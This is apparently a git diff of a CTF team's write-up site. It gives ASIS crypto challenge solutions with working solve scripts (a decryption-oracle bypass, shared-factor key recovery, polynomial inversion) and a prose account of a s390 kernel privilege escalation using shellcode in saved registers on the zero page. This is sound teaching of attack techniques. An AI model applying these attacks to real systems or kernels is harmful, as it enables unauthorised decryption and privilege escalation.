+`ASIS{4n_Ellip71c_curve_iZ_A_pl4Ne_al9ebr4iC_cUrv3}`
+
+
+## Jazzy
+
+### Challenge
+
+>Jazzy in the real world, but it's flashy and showy!
+
+```
+nc 76.74.178.201 31337
+```
+
+### Solution
+
+Connecting to the server, we are given the following options:
+
+```
+------------------------------------------------------------------------
+| ..:: Jazzy semantically secure cryptosystem ::.. |
+| Try to break this cryptosystem and find the flag! |
+------------------------------------------------------------------------
+| Options: |
+| [E]ncryption function |
+| [F]lag (encrypted)! |
+| [P]ublic key |
+| [D]ecryption oracle |
+| [Q]uit |
+|----------------------------------------------------------------------|
+```
+
+Calling `E` we are given the source of the encryption
+
+```python
+def encrypt(msg, pubkey):
+ h = len(bin(len(bin(pubkey)[2:]))[2:]) - 1 # dirty log :/
+ m = bytes_to_long(msg)
+ if len(bin(m)[2:]) % h != 0:
+ m = '0' * (h - len(bin(m)[2:]) % h) + bin(m)[2:]
+ else:
+ m = bin(m)[2:]
+ t = len(m) // h
+ M = [m[h*i:h*i+h] for i in range(t)]
+ r = random.randint(1, pubkey)
+ s_0 = pow(r, 2, pubkey)
+ C = []
+ for i in range(t):
+ s_i = pow(s_0, 2, pubkey)
+ k = bin(s_i)[2:][-h:]
+ c = bin(int(M[i], 2) ^ int(k, 2))[2:].zfill(h)
+ C.append(c)
+ s_0 = s_i
+ enc = int(''.join(C), 2)
+ return (enc, pow(s_i, 2, pubkey))
+```
+
+I'll talk about this more later, but let's play with the server and see what it allows us to do first.
+
+
+
+Sending the option `P` we get the `pubkey`
+
+```
+pubkey = 19386947523323881137657722758784550061106532690506305900249779841167576220076212135680639455022694670503210628255656646008011027142702455763327842867219209906085977668455830309111190774053501662218829125259002174637966634423791789251231110340244630214258655422173621444242489738175447333216354148711752466314530719614094724358835343148321688492410941279847726548532755612726470529315488889562870038948285553892644571111719902764495405902112917765163456381355663349414237105472911750206451801228088587783073435345892701332742065121188472147494459698861131293625595711112000070721340916959903684930522615446106875805793
+```
+
+Which for reasons below, I will now refer to as the modulus $n$. Sending the option `F`, we get the encryption of the flag, again with `pubkey` as a label, but from the encryption function, we know that this value is (or at least should be $s_{t+1} = s_t^2 \mod n$). Not sure why ASIS chose this confusing notation...
+
+```
+encrypt(flag, pubkey) = (513034390171324294434451277551689016606030017438707103869413492040051559571787250655384810990478248003042112532698503643742022419886333447600832984361864307529994477653561831340899157529404892382650382111633622198787716725365621822247147320745039924328861122790104611285962416151778910L, 1488429745298868766638479271207330114843847244232531062732057594917937561200978102167607190725732075771987314708915658110913826837267872416736589249787656499672811179741037216221767195188188763324278766203100220955272045310661887176873118511588238035347274102755393142846007358843931007832981307675991623888190387664964320071868166680149108371223039154927112978353227095505341351970335798938829053506618617396788719737045747877570660359923455754974907719535747353389095579477082285353626562184714935217407624849113205466008323762523449378494051510623802481835958533728111537252943447196357323856242125790983614239733L)
+```
+
+Lastly sending the option `D` we are given the prompt
+
+```
+| send an pair of integers, like (c, x), that you want to decrypt:
+```
+
+Being a wise guy, I tried sending the flag back to the server, but I was given the message
+
+```
+| this decryption is NOT allowed :P
+```
+
+Solving this challenge was easy after a bit of googling to try and see what this crypto system was. I noticed that the key stream was generated using a random number generator called [Blum Blum Shub](https://en.wikipedia.org/wiki/Blum_Blum_Shub). Looking for when this was used as a keystream, I stumbled upon the [Blum-Goldwasser Cryptosystem](https://en.wikipedia.org/wiki/Blum–Goldwasser_cryptosystem) and spending a little bit of time reading the Wikipedia page, I could tell that this was the right choice.
+
+#### Adaptive chosen plaintext attack
+
+Reading more closely, I spotted that the BG implementation is insecure against adaptive plaintext attacks when the attacker has access to a decryption oracle. This sounds great!!
+
+The idea is that to decrypt some ciphertext $(\vec{c}, s)$, one can pick a generic ciphertext using the same seed $(\vec{a}, s)$ and then use the decryption oracle to find $m^\prime$. As the seed is the same, both $m^\prime$ and the flag $m$ have been encrypted with the same keystream and we can obtain the flag from $m = \vec{a} \oplus \vec{c} \oplus m^\prime$.
+
+This sounds easy! Lets go back to the server and generate $m^\prime$:
+
+```
+| send an pair of integers, like (c, x), that you want to decrypt:
+(513034390171324294434451277551689016606030017438707103869413492040051559571787250655384810990478248003042112532698503643742022419886333447600832984361864307529994477653561831340899157529404892382650382111633622198787716725365621822247147320745039924328861122790104611285962416151778910, 1488429745298868766638479271207330114843847244232531062732057594917937561200978102167607190725732075771987314708915658110913826837267872416736589249787656499672811179741037216221767195188188763324278766203100220955272045310661887176873118511588238035347274102755393142846007358843931007832981307675991623888190387664964320071868166680149108371223039154927112978353227095505341351970335798938829053506618617396788719737045747877570660359923455754974907719535747353389095579477082285353626562184714935217407624849113205466008323762523449378494051510623802481835958533728111537252943447196357323856242125790983614239733)
+| this decryption is NOT allowed :P
+```
+
+Uh oh... it seems that the server checks the seed value and doesn't let us use this attack...
+
+#### Just one more block
+
+Okay, so if we can't use the same $s$ as the flag encryption, and we can't factor $n$ (waaaaaaay too big) what options do we have?
+
+I dunno if this attack has a proper name, but I realised we could fool the server into decrypting the flag by adding a block to the end of the ciphertext. For every block that is encoded, the encryption protocol takes $s_i$ and calculates $s_{i+1} = s_i^2 \mod n$. As a result, if the ciphertext being decoded was exactly one block longer, then the seed value we would supply to the oracle wouldn't be $s$, but rather $s^2 \mod n$.
+
+As we know `ct, s, n` we control enough data to solve the challenge, assuming that the server doesn't tell us off for sending $s^2 \mod n$...
+
+So, this *should* bypass the seed check in the oracle and allow us to decrypt the flag. All we need to do is take the pair `(ct, s)` from the server, together with the modulus `n` , add `h` bits to the end of `ct` and square `s`. Sending this to the oracle will decrypt our ciphertext block by block, we can finally remove the last `h` bits (which will have decoded to garbage) and grab the flag.
+
+To do this I wrote something quick and dirty
+
+```python
+n = 19386947523323881137657722758784550061106532690506305900249779841167576220076212135680639455022694670503210628255656646008011027142702455763327842867219209906085977668455830309111190774053501662218829125259002174637966634423791789251231110340244630214258655422173621444242489738175447333216354148711752466314530719614094724358835343148321688492410941279847726548532755612726470529315488889562870038948285553892644571111719902764495405902112917765163456381355663349414237105472911750206451801228088587783073435345892701332742065121188472147494459698861131293625595711112000070721340916959903684930522615446106875805793
+h = len(bin(len(bin(n)[2:]))[2:]) - 1
+
+flag_ct = 513034390171324294434451277551689016606030017438707103869413492040051559571787250655384810990478248003042112532698503643742022419886333447600832984361864307529994477653561831340899157529404892382650382111633622198787716725365621822247147320745039924328861122790104611285962416151778910
+seed = 1488429745298868766638479271207330114843847244232531062732057594917937561200978102167607190725732075771987314708915658110913826837267872416736589249787656499672811179741037216221767195188188763324278766203100220955272045310661887176873118511588238035347274102755393142846007358843931007832981307675991623888190387664964320071868166680149108371223039154927112978353227095505341351970335798938829053506618617396788719737045747877570660359923455754974907719535747353389095579477082285353626562184714935217407624849113205466008323762523449378494051510623802481835958533728111537252943447196357323856242125790983614239733
+seed_squared = pow(seed,2,n)
+flag_extended = bin(flag_ct)[2:] + '1'*h
+flag_extended = int(flag_extended, 2)
+
+print(f"({flag_extended}, {seed_squared})")
+```
+
+Using the data collected above. Sending our slightly longer flag to the server gives us a decrypted message:
+
+```
+(1050694431070872155001756216425859106009149475714472148724558831698025594003020289342228092908499451910230246466966535462383661915927210900686505951973098101821428690234494630586161474620221219599667982564625658263117243853548793491962157712885841765025507579474134243913651028278843209727, 3216641374118298063210229377328115445643813442578456023987769065661762517695051834586452075939576983800791011462122765510295327568646398522659752628912802933208909111321539625480585977865621874640928715606628766855738533853630742505790835948213775188951805695531626048779789826277990208281243968206104294503971898862963118207505455918079294280929081526755227996190831742555093366364879064928874861060462753403017976763786404530509469825731935018035684983539175758425557263211403465858234005521025395515018046387350089113701767863479780051534190944394815574406100307489105693633714510667995574063150674428700480235811)
+| the decrypted message is: 47771147116374265884489633343424974277884840496243413677482329815315049691915267634281287751924271959635398604756191897221446400520109091655450373658402419482516535670630080915290670126420548875478840451816545566711178369563850274167871301020132981380671014536902778264305709989256317962
+```
+
+Then we can simply grab the flag after chopping off 11 bits
+
+```python
+>>> from Crypto.Util.number import long_to_bytes
+>>> flag_ext = 47771147116374265884489633343424974277884840496243413677482329815315049691915267634281287751924271959635398604756191897221446400520109091655450373658402419482516535670630080915290670126420548875478840451816545566711178369563850274167871301020132981380671014536902778264305709989256317962
+>>> flag_bin = bin(flag_ext)[2:-11]
+>>> flag_int = int(flag_bin, 2)
+>>> flag = long_to_bytes(flag_int)
+>>> print(flag)
+b'((((......:::::: Great! the flag is: ASIS{BlUM_G0ldwaS53R_cryptOsySt3M_Iz_HI9hlY_vUlNEr4bl3_70_CCA!?} ::::::......))))'
+```
+
+No pwntools cracked out to do this one in a stylish way, but we still grab the flag!
+
+#### Flag
+
+`ASIS{BlUM_G0ldwaS53R_cryptOsySt3M_Iz_HI9hlY_vUlNEr4bl3_70_CCA!?}`
+
+## Crazy
+
+### Challenge
+
+>Look at you kids with your vintage music
+>
+>Comin' through satellites while cruisin'
+>
+>You're part of the past, but now you're the future
+>
+>Signals crossing can get confusing
+>
+>It's enough just to make you feel crazy, crazy, crazy
+>
+>Sometimes, it's enough just to make you feel crazy
+
+```python
+#!/usr/bin/python
+
+from Crypto.Util.number import *
+from flag import flag
+from secret import *
+
+def encrypt(msg, pubkey, xorkey):
+ h = len(bin(len(bin(pubkey)[2:]))[2:]) - 1 # dirty log :/
+ m = bytes_to_long(msg)
+ if len(bin(m)[2:]) % h != 0:
+ m = '0' * (h - len(bin(m)[2:]) % h) + bin(m)[2:]
+ else:
+ m = bin(m)[2:]
+ t = len(m) // h
+ M = [m[h*i:h*i+h] for i in range(t)]
+ r = random.randint(1, pubkey)
+ s_0 = pow(r, 2, pubkey)
+ C = []
+ for i in range(t):
+ s_i = pow(s_0, 2, pubkey)
+ k = bin(s_i)[2:][-h:]
+ c = bin(int(M[i], 2) ^ int(k, 2) & xorkey)[2:].zfill(h)
+ C.append(c)
+ s_0 = s_i
+ enc = int(''.join(C), 2)
+ return (enc, pow(s_i, 2, pubkey))
+
+for keypair in KEYS:
+ pubkey, privkey, xorkey = keypair
+ enc = encrypt(flag, pubkey, xorkey)
+ msg = decrypt(enc, privkey, xorkey)
+ if msg == flag:
+ print pubkey, enc
+```
+
+### Solution
+
+After solving Jazzy there's not much to this challenge. We know that it is an implementation of Blum-Goldwasser (albeit with an additional xorkey). Blum-Goldwasser's security relies on the hardness of factoring $n = p\cdot q$ and so our best chance to solve this puzzle is to find the factors of the pubkey.
+
+Looking at the challenge, we see we are given many many instances of the encryption. With all of these public keys, wouldn't it be a shame if some of them shared a factor?
+
+Putting the data into an array, I checked for common factors using `gcd` in the following way:
+
+```python
+def find_factors(data):
+ data_length = len(data)
+ for i in range(data_length):
+ p = data[i][0]
+ for j in range(i+1,data_length):
+ x = data[j][0]
+ if math.gcd(p,x) != 1:
+ print(f'i = {i}')
+ print(f'j = {j}')
+ print(f'p = {math.gcd(p,x)}')
+ return i, math.gcd(p,x)
+```
+
+Very quickly we get output:
+
+```python
+i = 0
+j = 7
+p = 114699564889863002119717546749303415014640174666510831598557661431094864991761656658454471662058404464073476167628817149960697375037558130201947795111687982132434309682025253703831106682712999472078751154844115223133651609962643428282001182462505433609132703623568072665114357116233526985586944694577610098899
+```
+
+and so with this, the whole encryption scheme is broken (ignoring the xorkey step of course).
+
+With the factors of the pubkey, we can follow the dycryption algorithm on [Wikipedia](https://en.wikipedia.org/wiki/Blum–Goldwasser_cryptosystem#Decryption) to get
+
+```python
+def xgcd(a, b):
+ """return (g, x, y) such that a*x + b*y = g = gcd(a, b)"""
+ x0, x1, y0, y1 = 0, 1, 1, 0
+ while a != 0:
+ (q, a), b = divmod(b, a), a
+ y0, y1 = y1, y0 - q * y1
+ x0, x1 = x1, x0 - q * x1
+ return b, x0, y0
+
+
+def decrypt(c, pubkey, p, q, s):
+ h = len(bin(len(bin(pubkey)[2:]))[2:]) - 1 # dirty log :/
+ if len(bin(c)[2:]) % h != 0:
+ c = '0' * (h - len(bin(c)[2:]) % h) + bin(c)[2:]
+ else:
+ c = bin(c)[2:]
+ t = len(c) // h
+
+ # Recover s0
+ dp = (((p + 1) // 4)**(t + 1)) % (p - 1)
+ dq = (((q + 1) // 4)**(t + 1)) % (q - 1)
+ up = pow(s, dp, p)
+ uq = pow(s, dq, q)
+ _, rp, rq = xgcd(p,q)
+ s_0 = (uq * rp * p + up * rq * q ) % pubkey
+
+ C = [c[h*i:h*i+h] for i in range(t)]
+ M = []
+ for i in range(t):
+ s_i = pow(s_0, 2, pubkey)
+ k = bin(s_i)[2:][-h:]
+ m = bin(int(C[i], 2) ^ int(k, 2))[2:].zfill(h)
+ M.append(m)
+ s_0 = s_i
+
+ msg = long_to_bytes(int(''.join(M),2))
+ return msg
+```
+
+With the crypto system all sorted out and checked against the encryption function (without the xorkey) we just need to find a way to do this last step. I started trying to think of a clever way to undo the xor with knowledge of several ct / msg pairs (many of the public keys share common factors) but then i realised that the block size is only 10 bits long and a brute force of `xorkey` would only mean guessing 1024 values.
+
+So, i took the easy way and included a loop inside my decrypt trying all values for the `xorkey` and storing any decryptions that had the flag format: `ASIS{`. The script takes seconds and finds the flag.
+
+
+
+### Implementation
+
+```python
+from Crypto.Util.number import *
+import math
+
+def find_factors(data):
+ data_length = len(data)
+ for i in range(data_length):
+ p = data[i][0]
+ for j in range(i+1,data_length):
+ x = data[j][0]
+ if math.gcd(p,x) != 1:
+ return i, math.gcd(p,x)
+
+
+def encrypt(msg, pubkey, xorkey):
+ h = len(bin(len(bin(pubkey)[2:]))[2:]) - 1 # dirty log :/
+ m = bytes_to_long(msg)
+ if len(bin(m)[2:]) % h != 0:
+ m = '0' * (h - len(bin(m)[2:]) % h) + bin(m)[2:]
+ else:
+ m = bin(m)[2:]
+ t = len(m) // h
+ M = [m[h*i:h*i+h] for i in range(t)]
+ r = random.randint(1, pubkey)
+ s_0 = pow(r, 2, pubkey)
+ C = []
+ for i in range(t):
+ s_i = pow(s_0, 2, pubkey)
+ k = bin(s_i)[2:][-h:]
+ c = bin(int(M[i], 2) ^ int(k, 2) & xorkey)[2:].zfill(h)
+ C.append(c)
+ s_0 = s_i
+ enc = int(''.join(C), 2)
+ return (enc, pow(s_i, 2, pubkey))
+
+
+def xgcd(a, b):
+ """return (g, x, y) such that a*x + b*y = g = gcd(a, b)"""
+ x0, x1, y0, y1 = 0, 1, 1, 0
+ while a != 0:
+ (q, a), b = divmod(b, a), a
+ y0, y1 = y1, y0 - q * y1
+ x0, x1 = x1, x0 - q * x1
+ return b, x0, y0
+
+
+def decrypt(c, pubkey, p, q, s):
+ # Idiot checks
+ assert p*q == pubkey
+ assert isPrime(p) and isPrime(q)
+
+ h = len(bin(len(bin(pubkey)[2:]))[2:]) - 1 # dirty log :/
+ if len(bin(c)[2:]) % h != 0:
+ c = '0' * (h - len(bin(c)[2:]) % h) + bin(c)[2:]
+ else:
+ c = bin(c)[2:]
+ t = len(c) // h
+
+ # Recover s0
+ dp = (((p + 1) // 4)**(t + 1)) % (p - 1)
+ dq = (((q + 1) // 4)**(t + 1)) % (q - 1)
+ up = pow(s, dp, p)
+ uq = pow(s, dq, q)
+ _, rp, rq = xgcd(p,q)
+ s0 = (uq * rp * p + up * rq * q ) % pubkey
+
+
+ C = [c[h*i:h*i+h] for i in range(t)]
+
+ # Brute xorkey (max size: 2**10 - 1)
+ flags = []
+ for X in range(1024):
+ # Restore value for brute, and empty M
+ s_0 = s0
+ M = []
+
+ for i in range(t):
+ s_i = pow(s_0, 2, pubkey)
+ k = bin(s_i)[2:][-h:]
+ m = bin(int(C[i], 2) ^ int(k, 2) & X)[2:].zfill(h)
+ M.append(m)
+ s_0 = s_i
+
+ fl = long_to_bytes(int(''.join(M),2))
+ try:
+ flag = fl.decode()
+ if "ASIS{" in flag:
+ flags.append(flag)
+ except:
+ pass
+ return flags
+
+# data from challenge.txt, truncated to only two values save space
+data = [[12097881278174698631026228331130314850080947749821686944446636213641310652138488716240453597129801720504043924252478136044035819232933933717808745477909546176235871786148513645805314150829468800301698799525780070273753857243854268554322340900904051857831398492096742127894417784386491191471947863787022245824307084379225579368393254254088207494229400873467930160606087032014972366802086915193167585867760542665623158008113534159892785943512727008525032377162641992852773743617023163398493300810949683112862817889094615912113456275357250831609021007534115476194023075806921879501827098755262073621876526524581992383113, (238917053353586684315740899995117428310480789049456179039998548040503724437945996038505262855730406127564439624355248861040378761737917431951065125651177801663731449217955736133484999926924447066163260418501214626962823479203542542670429310307929651996028669399692119495087327652345, 2361624084930103837444679853087134813420441002241341446622609644025375866099233019653831282014136118204068405467230446591931324445417288447017795525046075282581037551835081365996994851977871855718435321568545719382569106432442084085157579504951352401314610314893848177952589894962335072249886688614676995039846245628481594015356555808852415257590789843672862086889766599032421071154614466932749223855909572291554620301269793104658552481172052104139007105875898227773975867750358642521359331140861015951930087364330158718293540721277710068251667789725792771210694545702423605041261814818477350926741922865054617709373)],[11618071445988286159614546200227554667389205281749443004629117264129957740203770615641847148204810865669191685874152730267573467338950993270113782537765608776375192263405546036787453939829561684834308717115775768421300006618296897365279937358126799904528083922552306565620644818855350306352024366076974759484150214528610355358152789696678410732699598714566977211903625075198935310947340456263339204820065134900427056843183640181066232714511087292771420839344635982165997540089604798288048766074061479118366637656581936395586923631199316711697776366024769039316868119838263452674798226118946060593631451490164411150841, (108436642448932709219121968294434475477600203743366957190466733100162456074942118592019300422638950272524217814290069806411298263273760197756252555274382639125596214182186934977255300451278487595744525177460939465622410473654789382565188319818335934171653755811872501026071194087051, 10240139028494174526454562399217609608280817984150287983207668274231906642607868694849967043415262875107269045985517134901896201464915880088854955991401353416951487254838341232922059441309704096261457984093029892511268213868493162068362288179130193503313930139616441614927005917140608739837772400963531761014330142192223670723732255263011157267423056439150678533763741625000032136535639171133174846473584929951274026212224887370702861958817381113058491861009468609746592170191042660753210307932264867242863839876056977399186229782377108228334204340285592604094505980554432810891123635608989340677684302928462277247999)]]
+
+i, p = find_factors(data)
+n = data[i][0]
+c, s = data[i][1]
+q = n // p
+
+print(decrypt(c, n, p, q, s))
+```
+
+#### Flag
+
+`ASIS{1N_h0nOr_oF__Lenore__C4r0l_Blum}`
+
+
+## Tripolar
+
+**Disclaimer** I didn't solve this challenge during the competition and it took me reading a [writeup](https://ctftime.org/writeup/22112) to understand how this challenge works. I'm writing it up to talk myself through the solution, and maybe someone else will read this and be surprised by the solution too.
+
+After working through this, my take away is that my intuition for cube roots was way off! The key for solving this challenge is that given a polynomial of the form
+
+
+$$
+f(x, y, z) = x^3 + y^2 + z
+$$
+
+
+One can recover the value of $x$ from taking the cube root of $f(x,y,z)$. Even after I read this, I couldn't believe there wasn't some loss of information of the LSB of $x$, but it seems like it holds, even for small positive integers
+
+```python
+>>> from Crypto.Util.number import *
+>>> import gmpy2
+>>> gmpy2.get_context().precision = 4096
+>>> x, y, z = [getPrime(256) for _ in range(3)]
+>>> f = x**3 + y**2 + z
+>>> _x = gmpy2.iroot(f, 3)[0]
+>>> x == _x
+True
+>>> x, y, z = [getPrime(5) for _ in range(3)]
+>>> f = x**3 + y**2 + z
+>>> _x = gmpy2.iroot(f, 3)[0]
+>>> x == _x
+True
+```
+
+The same is true for quadratic terms, by looking at the square root of $f - x^3$, but here there seems to be a bit less certainty and we find with small enough inputs, the square root approximation can be off by 1.
+
+Anyway... with my display of ignorance out the way, lets look at the challenge!
+
+
+### Challenge
+
+```python
+#!/usr/bin/python
+
+from Crypto.Util.number import *
+from hashlib import sha1
+from flag import flag
+
+def crow(x, y, z):
+ return (x**3 + 3*(x + 2)*y**2 + y**3 + 3*(x + y + 1)*z**2 + z**3 + 6*x**2 + (3*x**2 + 12*x + 5)*y + (3*x**2 + 6*(x + 1)*y + 3*y**2 + 6*x + 2)*z + 11*x) // 6
+
+def keygen(nbit):
+ p, q, r = [getPrime(nbit) for _ in range(3)]
+ pk = crow(p, q, r)
+ return (p, q, r, pk)
+
+def encrypt(msg, key):
+ p, q, r, pk = key
+ _msg = bytes_to_long(msg)
+ assert _msg < p * q * r
+ _hash = bytes_to_long(sha1(msg).digest())
+ _enc = pow(_msg, 31337, p * q * r)
+ return crow(_enc * pk, pk * _hash, _hash * _enc)
+
+key = keygen(256)
+enc = encrypt(flag, key)
+f = open('flag.enc', 'w')
+f.write(long_to_bytes(enc))
+f.close()
+```
+
+
+Reading through the code, we see that the flag is encrypted RSA style using three primes $p,q,r$. The message is also hashed with `sha1` and the three primes used for encryption are fed into some fairly ugly polynomial named `crow` to produce another value `pk`.
+
+The results of these computations are then all taken together, multiplied to and fed into the `crow` function again. The only output of the challenge is `enc`, which is the value of the second evaluation of the `crow` polynomial.
+
+We then understand this challenge as learning how to find the integer solutions of `crow` so we can work backwards to finding the flag. Solving the first step will give us `_enc`, `_hash` and `pk` and solving `pk = crow(p,q,r)` we can grab the primes and reverse the encryption of `_enc`. But how to we solve `crow`?
+
+During the competition I got toally sidetracked by the paper [A Strategy for Finding Roots of Multivariate Polynomials with New Applications in Attacking RSA Variants](http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.61.8061&rep=rep1&type=pdf) by Jochemsz and May, and decided the solution to this puzzle must be to implement the small integer roots algorithm that they give in 2.2 of the paper. This was hard to specialise to this polynomial and i failed. Potentially this method works, but I couldnt get it to. The closest I got was to notice that the bitsize of `_enc*pk` was larger than the other two elements of `crow` and so by taking the cube root, I could recover the MSB of `_enc*pk`. Typing this up now I see i was kind of close, but thinking totally wrong.
+
+The real solution is much simplier and elegant and relies on the fact that we can find certain terms in the polynomial due to the various powers of certain terms (I've already explained this a little in the disclaimer). What we find is with a few steps of algebra and a resetting of my intuition of cube roots, this challenge has a nice solution.
+
+
+### Solution
+
+The first step to solving this challenge is simplifying the polynomial. I went down a rabbit hole of Legendre polynomials, taking the "dipole" hint way too seriously. Im not sure what the "Tripolar" hint was pointing towards... maybe some can enlighten me.
+
+The crow polynomial is given to us in the form
+
+$$
+\begin{align}
+C(x,y,x) &= \frac16 \big( x^3 + 3(x + 2)y^2 + y^3 + 3(x + y + 1)z^2 + z^3 + 6x^2\\
+ &+ (3x^2 + 12x + 5)y + (3x^2 + 6(x + 1)y + 3y^2 + 6x + 2)z + 11x \big)
+\end{align}
+$$
+
+This is a big mess, but we can notice that the coefficient for all cubic terms is $1$ (ignoring the overall factor of a sixth) and we can start to piece together simple parts of this expression until we obtain
+
+$$
+C(x,y,z) = \frac16 \left((x + y + z + 1 )^3 + 3(x + y + 1)^2 + 2(x + y + 1) - 6y - z - 6 \right)
+$$
+
+This is looking better, and by renaming a few pieces we get the polynomial into the form
+
+$$
+C(x,y,z) = \frac16 \left( f^3 + 3h^2 +2h -6y - z - 6 \right) \\
+$$
+
+Where we have defined
+
+$$
+f(x,y,z) = x + y + z + 1 \qquad h(x,y) = x + y + 1
+$$
+
+
+We now see how the disclaimer discussed above is going to help us. By taking the cube root of `enc`, we will recover the value for $f(x,y,z)$! Following this, we know that
+
+
+$$
+6 C - f^3 = 3h^2 + 2h - 6y - z - 6,
+$$
+
+
+and by the same approximation, the square root of the left hand side will be a good approximation for $h$. **Note** for the second time we solve `crow` with the smaller inputs of the three primes, we will find this approximation is off by one, which can be spotted by either making mistakes, or trying out this step with some known values of $p,q,r$.
+
+With knowledge of both $f(x,y,z)$ and $h(x,y)$, we can recover the input values from the three expressions
+
+
+$$
+\begin{align}
+z &= f - h \\
+y &= -\frac16 \left( 6C - f^3 - 3h^2 - 2h + z + 6\right) \\
+x &= h - y - 1
+\end{align}
+$$
+
+
+With the triple $(x,y,z)$ from `crow` we can find the input parameters from the gcd of the inputs:
+
+```python
+import math
+
+_enc = math.gcd(x,z)
+pk = math.gcd(x,y)
+_hash = math.gcd(y,z)
+```
+
+Solving `crow` from `pk` will give three primes $p,q,r$ and from that we can decrypt `_enc` from
+
+```python
+from Crypto.Util.number import *
+
+N = p*q*r
+phi = (p-1)*(q-1)*(r-1)
+d = inverse(31337, phi)
+m = pow(_enc, d, N)
+print(long_to_bytes(m))
+```
+
+
+
+### Implementation
+
+
+```python
+import gmpy2
+import math
+from Crypto.Util.number import *
+from hashlib import sha1
+gmpy2.get_context().precision = 4096
+
+def crow(x, y, z):
+ return (x**3 + 3*(x + 2)*y**2 + y**3 + 3*(x + y + 1)*z**2 + z**3 + 6*x**2 + (3*x**2 + 12*x + 5)*y + (3*x**2 + 6*(x + 1)*y + 3*y**2 + 6*x + 2)*z + 11*x) // 6
+
+
+def keygen(nbit):
+ p, q, r = [getPrime(nbit) for _ in range(3)]
+ pk = crow(p, q, r)
+ return (p, q, r, pk)
+
+
+def encrypt(msg, key):
+ p, q, r, pk = key
+ _msg = bytes_to_long(msg)
+ assert _msg < p * q * r
+ _hash = bytes_to_long(sha1(msg).digest())
+ _enc = pow(_msg, 31337, p * q * r)
+ return crow(_enc * pk, pk * _hash, _hash * _enc)
+
+
+def alt_crow(x, y, z):
+ return ((x + y + z + 1 )**3 + 3*(x + y + 1)**2 + 2*(x + y + 1) - 6*y - z - 6) // 6
+
+
+def solve_crow(c, delta):
+ """
+ Solve equation of the form:
+ crow = [(x + y + z + 1 )**3 + 3*(x + y + 1)**2 + 2*(x + y + 1) - 6*y - z - 6] // 6
+ = [f^3 + 3h^3 + 2h - g] // 6
+ f = x + y + z + 1
+ h = x + y + 1
+ g = 6y + z + 6
+ """
+ f = gmpy2.iroot(6*c, 3)[0]
+ h2 = (6*c - f**3) // 3
+ """
+ For small values of inputs, the square root is off by one
+ """
+ h = gmpy2.iroot(h2, 2)[0] + delta
+ z = f - h
+ y = -(6*c - f**3 - 3*h**2 - 2*h + z + 6) // 6
+ x = h - y - 1
+ assert crow(x, y, z) == c
+ return x,y,z
+
+
+def decrypt(ct):
+ # Solve for arguments
+ x, y, z = solve_crow(ct, 0)
+ assert crow(x, y, z) == ct
+
+ # Recover pieces
+ _enc = math.gcd(x, z)
+ pk = x // _enc
+ _hash = z // _enc
+ assert crow(_enc * pk, pk * _hash, _hash * _enc) == ct
+
+ # Solve for primes
+ p, q, r = solve_crow(pk, 1)
+ assert crow(p, q, r) == pk
+
+ # Solve encryption
+ N = p*q*r
+ phi = (p-1)*(q-1)*(r-1)
+ d = inverse(31337, phi)
+ m = pow(_enc, d, N)
+ return long_to_bytes(m)
+
+# Sanity test
+p, q, r, pk = keygen(256)
+# Check alt form is correct
+assert alt_crow(p,q,r) == pk
+# Check solver finds values
+x, y, z = solve_crow(pk, 1)
+assert x == p and y == q and z == r
+
+ct = open('flag.enc', "rb").read()
+ct = bytes_to_long(ct)
+flag = decrypt(ct)
+print(flag)
+```
+
+
+#### Flag
+
+`ASIS{I7s__Fueter-PoLy4__c0nJ3c7UrE_iN_p4Ir1n9_FuNCT10n}`
diff --git a/CNAME b/CNAME
new file mode 100644
index 0000000..ec97f5d
--- /dev/null
+++ b/CNAME
@@ -0,0 +1 @@
+org.anize.rs
diff --git a/CTFzone-2022/index.html b/CTFzone-2022/index.html
new file mode 100755
index 0000000..569bff2
--- /dev/null
+++ b/CTFzone-2022/index.html
@@ -0,0 +1,216 @@
+
+
+
+
+
+CTFzone 2022 | Organisers
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
The custom syscall zeroes every general-purpose register and then jumps to an
+address chosen by us. Somehow we have to use this to become root.
+
+
What makes this challenge difficult is that we have to write a kernel exploit for a fairly obscure architecture that no one on the team had seen before, and which is not supported by most of the tools we normally use (pwndbg, gef, vmlinux-to-elf, etc…).
+
+
Exploitation
+
+
The first thing I tried was to replicate the solution we used for the original
+challenge at SECCON. Unfortunately that doesn’t work because the root filesystem
+is no longer in an initramfs but in an ext2 disk. The flag is no longer in memory
+and we would need to read from the disk first.
+
+
I also tried to use the intended solution for the original challenge (inject
+shellcode in the kernel by using the eBPF JIT), but…
+
+
/ $ /pwn
+seccomp: Function not implemented
+
+
+
it looks like the challenge kernel is compiled without eBPF or seccomp, so we
+can’t use that to inject shellcode either.
+
+
I also tried to load some shellcode in userspace, and then jump to it
Unfortunately that didn’t work either. At this point I started reading more about
+the architecture that the challenge it’s running on. I found this page from the
+Linux kernel documentation, as well as IBM’s manual useful.
+
+
As it turns out, on z/Architecture the kernel and userspace programs run in
+completely different address spaces. Userspace memory is simply not accessible
+from kernel mode without using special instructions and we cannot jump to
+shellcode there.
+
+
At this point I was out of ideas and I started looking at the implementation of
+Linux’s system call handler for inspiration. One thing that I found interesting
+is that the system call handler reads information such as the kernel stack
+from a special page located at address zero. The structure of this special zero
+page (lowcore) is described in this Linux header file.
+
+
Interestingly enough on this architecture, or at least on the version emulated by
+QEMU, all memory is executable. Linux’s system call handler even jumps to a
+location in the zero page to return to userspace. If we could place some
+controlled data somewhere, we could just jump to it to get arbitrary code
+execution in the kernel.
+
+
At some point I started looking at the contents of the zero page in gdb and I
+realized that there is some memory that we could control there and use as
+shellcode. For example save_area_sync at offset 0x200 contains the values of
+registers r8-r15 before the system call. The values of those registers are completely
+controlled by us in userspace. What if we placed some shellcode in the registers
+and jumped to it? I used a very similar idea to solve kernote from the 0CTF 2021 finals
+except this time instead of merely using the saved registers as a ROP chain,
+they’re actually executable and we can use them to store actual shellcode!
+
+
We only have 64 bytes of space for the shellcode, which isn’t a lot but should
+be enough for a small snippet that gives us root and returns to userspace.
+
+
The zero page even contains a pointer to the current task, and we can use that
+to find a pointer to our process’s creds structure and zero the uid to get root.
+
+
+
+
+
+
+
diff --git a/CTFzone-2022/pwn/390_gadget.md b/CTFzone-2022/pwn/390_gadget.md
new file mode 100755
index 0000000..9ff925f
--- /dev/null
+++ b/CTFzone-2022/pwn/390_gadget.md
@@ -0,0 +1,229 @@
+# THREE NINETY GADGET
+
